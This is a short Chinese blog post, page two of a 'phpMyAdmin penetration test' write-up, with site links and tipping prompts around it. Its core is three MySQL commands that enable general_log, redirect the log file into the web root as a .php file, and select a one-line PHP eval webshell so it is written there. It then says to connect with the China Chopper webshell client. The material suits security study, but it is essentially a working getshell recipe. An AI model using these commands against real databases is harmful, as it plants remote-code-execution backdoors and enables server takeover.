分享Phpmyadmin的一次渗透测试

2022-04-28 13:00:34 PHP中文网数据库百度已收录

当前第2页返回上一页

mysql 5.0版本以上会创建日志文件，修改日志的全局变量，也可以getshell。但是也要对生成的日志有可读可写的权限。

1

2

3

set global general_log = "ON";   #当开启general时，所执行的sql语句都会出现在WIN-30DFNC8L78A.log文件那么，如果修改general_log_file的值，那么所执行的sql语句就会对应生成进而getshell
SET global general_log_file='D:/phpStudy/WWW/test1234.php';  #对应就会生成test1234.php文件
select '<?php eval($_POST[2019]);?>';          #将一句话木马写入test1234.php文件

菜刀连接：

以上就是分享Phpmyadmin的一次渗透测试的详细内容，更多文章请关注木庄网络博客！

返回前面的内容

相关阅读 >>

phpMyAdmin设置id主键自增报错怎么办

phpMyAdmin怎么为数据表设置主键

phpMyAdmin怎么修改上传文件大小

phpMyAdmin怎么通过日记提权

phpMyAdmin数据库乱码

wamp中怎么升级phpMyAdmin版本

关于phpMyAdmin提权那些事

phpMyAdmin用户名和密码是什么

phpMyAdmin账号密码怎么改

如何将phpMyAdmin设置为禁止外网访问

更多相关阅读请进入《phpMyAdmin》频道 >>

书籍

数据库系统概念第6版

￥41.1元 机械工业出版社

本书主要讲述了数据模型、基于对象的数据库和XML、数据存储和查询、事务管理、体系结构等方面的内容。

转载请注明出处：木庄网络博客 » 分享Phpmyadmin的一次渗透测试

标签：phpMyAdmin

木庄网络博客

感谢您的支持，我会继续努力的!

扫码支持

扫码打赏，您说多少就多少

支付宝

打开支付宝扫一扫，即可进行扫码打赏哦

分享从这里开始，精彩与您同在

相关推荐

评论

管理员已关闭评论功能...

欢迎访问木庄网络博客
可复制：代码框内的文字。
方法：Ctrl+C。